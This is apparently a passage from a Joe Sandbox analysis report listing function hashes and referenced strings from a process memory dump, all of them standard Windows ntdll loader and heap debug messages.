                                                                                                                                      • Opcode ID: b53f7115b0027ac86bd7b88294d25dd8200394043b73beaddaecdeaa688763ab
                                                                                                                                      • Instruction ID: 721c8cc20bfced166f52756f93169646c4d133114e82e0dca656d0841b702c3b
                                                                                                                                      • Opcode Fuzzy Hash: b53f7115b0027ac86bd7b88294d25dd8200394043b73beaddaecdeaa688763ab
                                                                                                                                      • Instruction Fuzzy Hash: 0F90027120200C42D50061584504B46009647E0345F51C41BA4116A14DC625C8557521
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8d3401853c1bfe795ccbb2e21dcc066753c58db88b3816a32e16c229287a34b3
                                                                                                                                      • Instruction ID: a345951a1fa92c99971791631f7eef6bd35f4b2b47c262ad5681279ca4485745
                                                                                                                                      • Opcode Fuzzy Hash: 8d3401853c1bfe795ccbb2e21dcc066753c58db88b3816a32e16c229287a34b3
                                                                                                                                      • Instruction Fuzzy Hash: 8690026160600802D5407158551870600A647D0245F51D416A4016914DC669CA5976A1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                      • Instruction ID: 3b5084d5299d8eb438055bc316156569d031c7ce94a77183540575ef25cdfd14
                                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: HEAP:
                                                                                                                                      • API String ID: 3446177414-2466845122
                                                                                                                                      • Opcode ID: d2afad35d703109c9766bd2e4edd14994ba560cbb24bc5f6ef43324c30fde0d5
                                                                                                                                      • Instruction ID: 287f1c9f95814f6a16f243bb6a1f3e1b11b4c5f771f1fa22caa70e4b3da5700d
                                                                                                                                      • Opcode Fuzzy Hash: d2afad35d703109c9766bd2e4edd14994ba560cbb24bc5f6ef43324c30fde0d5
                                                                                                                                      • Instruction Fuzzy Hash: C9A18D75B143128FDB04CE18C894A1ABBEAFF88390F06456DE985EB310EB71EC45CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 34254592
                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34254460
                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34254530
                                                                                                                                      • ExecuteOptions, xrefs: 342544AB
                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34254507
                                                                                                                                      • Execute=1, xrefs: 3425451E
                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3425454D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                      • Opcode ID: 27b9976d294754d09b15a7f08ed49aaacc9287d93e478a8d3536e07961f8e474
                                                                                                                                      • Instruction ID: 7102f7553f5ee6c9f5d1ae44528e0f9ae52eb74c93cf6e59c9a0d1cac04f7bbf
                                                                                                                                      • Opcode Fuzzy Hash: 27b9976d294754d09b15a7f08ed49aaacc9287d93e478a8d3536e07961f8e474
                                                                                                                                      • Instruction Fuzzy Hash: 19511671A00719BEFB109A94DC84FA9B3EDEF98384F4004E9E906B7180EB709E45CE50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 342478F3
                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 342477E2
                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 342477DD, 34247802
                                                                                                                                      • SsHd, xrefs: 341FA304
                                                                                                                                      • Actx , xrefs: 34247819, 34247880
                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34247807
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                      • Opcode ID: 7fcbd079e99451afc873fd9bc7633bf86df7962bfcac0cce7ab979759fb3305b
                                                                                                                                      • Instruction ID: 6a892a7ef7002ea8831924977842d558a6d8e96fcc50a6c629a86efc91550467
                                                                                                                                      • Opcode Fuzzy Hash: 7fcbd079e99451afc873fd9bc7633bf86df7962bfcac0cce7ab979759fb3305b
                                                                                                                                      • Instruction Fuzzy Hash: 11E1CE74608B028FE714CE24C8D071A77E5EB847A4F514B6DE865DB290D73AD846CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34249372
                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34249153
                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 3424914E, 34249173
                                                                                                                                      • GsHd, xrefs: 341FD794
                                                                                                                                      • Actx , xrefs: 34249315
                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34249178
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                      • Opcode ID: e4329d944764d6befae46908ca1db8b191ec60987b5aa874b828df99edeff448
                                                                                                                                      • Instruction ID: 51f81f84506921947fbcfc4a3fe274f4f5531fabca2d9fdb06359310dbc5213f
                                                                                                                                      • Opcode Fuzzy Hash: e4329d944764d6befae46908ca1db8b191ec60987b5aa874b828df99edeff448
                                                                                                                                      • Instruction Fuzzy Hash: FAE1BF746087028FE704CF25C8C0B5AB7E5FB89358F404A6DE8969B291D772E846CF92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                      • Opcode ID: 37bf179e924b99fff81b7473317e13487bdf3f6babb161e1ce0bf21ece5fca2d
                                                                                                                                      • Instruction ID: b38d0f54ca903ee9d82990aea14e44856db075b7517b111361859bda237bed63
                                                                                                                                      • Opcode Fuzzy Hash: 37bf179e924b99fff81b7473317e13487bdf3f6babb161e1ce0bf21ece5fca2d
                                                                                                                                      • Instruction Fuzzy Hash: 88414BB9E0120AABDB01CF99C994AEEBBB9FF48354F1100A9E914B7350D7719E01CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                      • Opcode ID: 2b45034bfee3d55b07af5806d7a7a97f82a80fcc9aacc71f295c1bcd0ac46f5a
                                                                                                                                      • Instruction ID: c980796d1ba80256b18dd0a066cf712b6bf2f8d59b1d1004c026260f3c16b2b5
                                                                                                                                      • Opcode Fuzzy Hash: 2b45034bfee3d55b07af5806d7a7a97f82a80fcc9aacc71f295c1bcd0ac46f5a
                                                                                                                                      • Instruction Fuzzy Hash: 7E71EF75A11A85DFEB01CF68C4906ADFBF2FF8A354F058099E485BB291CB319941CB54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • LdrpLoadShimEngine, xrefs: 3423984A, 3423988B
                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34239843
                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34239885
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 34239854, 34239895
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                      • Opcode ID: 79384d17b8ce9a92d15788a04135332208c4e37eec920053335a649151fd09ca
                                                                                                                                      • Instruction ID: 418d55b9a74cf829c154bb9594afe6919791acb3dda64a2c3410ad4667e31812
                                                                                                                                      • Opcode Fuzzy Hash: 79384d17b8ce9a92d15788a04135332208c4e37eec920053335a649151fd09ca
                                                                                                                                      • Instruction Fuzzy Hash: 8F51F5B5E107549FEB04EBACCC98EAD7BB6EB56304F040159E451BB2A5CB709C41CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                      • Opcode ID: ed55d1f108cd311d2e23866610836055173b38e945eb033516dc471445921bf8
                                                                                                                                      • Instruction ID: 8afcc153d5f32e3bbc32b736ecc9cff026d1c4895818ea5f7aa1418b791c3e20
                                                                                                                                      • Opcode Fuzzy Hash: ed55d1f108cd311d2e23866610836055173b38e945eb033516dc471445921bf8
                                                                                                                                      • Instruction Fuzzy Hash: 91416775A25B42DFE705CF68C884B6AB7E5EF81364F0185ADE51677381CB38A980CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • HEAP: , xrefs: 3428ECDD
                                                                                                                                      • ---------------------------------------, xrefs: 3428EDF9
                                                                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3428EDE3
                                                                                                                                      • Entry Heap Size , xrefs: 3428EDED
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                      • API String ID: 3446177414-1102453626
                                                                                                                                      • Opcode ID: 85bfbd4287041feb72bf8d9db904ef72744a69fe07ec31bd519485b9b28d4193
                                                                                                                                      • Instruction ID: f6c352f74be819938b3f5b0df670466bd21f0c80a140e488bbf50fa917caf941
                                                                                                                                      • Opcode Fuzzy Hash: 85bfbd4287041feb72bf8d9db904ef72744a69fe07ec31bd519485b9b28d4193
                                                                                                                                      • Instruction Fuzzy Hash: 8C418D79E00216DFD704DF18C48895EBBAAFF4A39472580ADD425FB2A1C731EC42CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                      • Opcode ID: 733cd74612afe5248ab30cc7b9fa7c4c12d765bb6657a749253ebe69d073eb87
                                                                                                                                      • Instruction ID: 159dfe2a9422d30a39137efccc57d1aafb15fb44a1ae266ca907879736ada660
                                                                                                                                      • Opcode Fuzzy Hash: 733cd74612afe5248ab30cc7b9fa7c4c12d765bb6657a749253ebe69d073eb87
                                                                                                                                      • Instruction Fuzzy Hash: 01315575621F84DFF716CB28C888B6A77E9EF02690F014489E45277791CB65E940CE15
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: $$@
                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                      • Opcode ID: 176b36e7dc4481cb4528c6a77ccb8eef43f7dff735ed5210346a7c9f378b7658
                                                                                                                                      • Instruction ID: 01ffa96cc53f40adb139f481c614cb5a671c09a32d2f66f4b082c1dad2a643f1
                                                                                                                                      • Opcode Fuzzy Hash: 176b36e7dc4481cb4528c6a77ccb8eef43f7dff735ed5210346a7c9f378b7658
                                                                                                                                      • Instruction Fuzzy Hash: 7F8129B5D006699BEB25CB54CC84BEEB7B8EB08750F0041EAA919B7250D7709E85CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • LdrpFindDllActivationContext, xrefs: 34253440, 3425346C
                                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34253439
                                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 3425344A, 34253476
                                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 34253466
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                      • API String ID: 3446177414-3779518884
                                                                                                                                      • Opcode ID: f43132fd53b48da03b986a4abf87df3d3a2e6bf4bf5d17d299452a71c441627d
                                                                                                                                      • Instruction ID: b1b2a239c716041a0ee5a79b2ca5f524dbd8135a96bc73cdf6f326ae88fe0a02
                                                                                                                                      • Opcode Fuzzy Hash: f43132fd53b48da03b986a4abf87df3d3a2e6bf4bf5d17d299452a71c441627d
                                                                                                                                      • Instruction Fuzzy Hash: 6531D7B6E007D3AFFB219B48C889F56B6E4EF113D4F42836AD80C77150D7609D80C695
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • LdrpDynamicShimModule, xrefs: 3424A7A5
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3424A7AF
                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3424A79F
                                                                                                                                      • apphelp.dll, xrefs: 34202382
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                      • Opcode ID: b567b5b73a0ed45efaa73e9a21e9d1bf292affeead90ab576d080ba5794c9826
                                                                                                                                      • Instruction ID: 18d39d5940f51a9f71c0fb2449b0ef87eb600b02665d218b04a548137e12eac4
                                                                                                                                      • Opcode Fuzzy Hash: b567b5b73a0ed45efaa73e9a21e9d1bf292affeead90ab576d080ba5794c9826
                                                                                                                                      • Instruction Fuzzy Hash: DC310376E00601EFF7189F1DC889E5EBBB6EB85750F1540AAE911B7350DA709C82CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                      • Opcode ID: 8a2fcdd8842d0146bd9b132bd641049b6d970da565687735259c6d80cbdfd862
                                                                                                                                      • Instruction ID: 7b25decc1e408cc22be5b127ba66320c86fb01dbde3c6a6f4a843fec9055728b
                                                                                                                                      • Opcode Fuzzy Hash: 8a2fcdd8842d0146bd9b132bd641049b6d970da565687735259c6d80cbdfd862
                                                                                                                                      • Instruction Fuzzy Hash: C89127F1705B41EFE319CB24C8D0B3AB7AAFF46684F010559F845AB285DB34E945CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 34249F1C
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 34249F2E
                                                                                                                                      • LdrpCheckModule, xrefs: 34249F24
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                      • Opcode ID: b5bfbb5fc571164115768ed1c0d846020e45991b8d3314ed2deb6f6b95a04279
                                                                                                                                      • Instruction ID: a08b5adad5f6334186d38ec5a9183b3edea80ffa40979dfeec702b3837d1dbaf
                                                                                                                                      • Opcode Fuzzy Hash: b5bfbb5fc571164115768ed1c0d846020e45991b8d3314ed2deb6f6b95a04279
                                                                                                                                      • Instruction Fuzzy Hash: 7C71AD75E00606DFEB08DF69C884BAEBBF5EB44248F14846DE816F7250E774AA42CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • LdrpCheckRedirection, xrefs: 3426450F
                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34264508
                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 34264519
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
